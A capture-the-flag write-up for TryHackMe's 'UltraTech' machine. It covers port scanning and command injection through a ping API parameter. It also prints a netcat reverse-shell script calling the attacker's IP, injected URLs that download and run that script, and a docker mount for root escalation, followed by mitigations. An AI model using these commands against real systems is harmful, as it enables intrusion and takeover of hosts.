UltraTech Write-up

Description

“UltraTech” is a boot2root machine on TryHackMe. It has intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have is the company’s name and their server’s IP address.

Enumeration

First of all an Nmap scan was used to scan all ports on the target machine.

sudo nmap -p- -oN nmap/all -vv 10.10.29.189
sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv
Pinging the attacker machine
Receiving the ping
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20id

Initial Access

The following bash script was created and served by the attacker via HTTP.

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0a%20curl%20http://<attacker ip>/shell.sh%20-o%20shell.sh
http://10.10.29.189:8081/ping?ip=127.0.0.1%20%0A%20bash%20shell.sh
SQLITE database file
Exfiltration via netcat

Privilege Escalation to r00t

“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of a password reuse.

Privilege Escalation

The privilege escalation could be accomplished by abusing the docker command.

docker run -v /root:/mnt -it bash

Mitigation

The filter on the API should be hardened. Furthermore functionality that is not ready to use, should not be deployed on a live machine. Also passwords should not be hashed with the MD5 hash function. An appropriate password hashing function should be used instead, e.g. PBKDF2. Also the password policy should prohibit the use of common passwords. The reuse of password should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the docker group, will also give them root rights. The user r00t should not be in the docker group if not needed.

Passionate about Cyber Security. I am publishing CTF writeups and Cybersec content!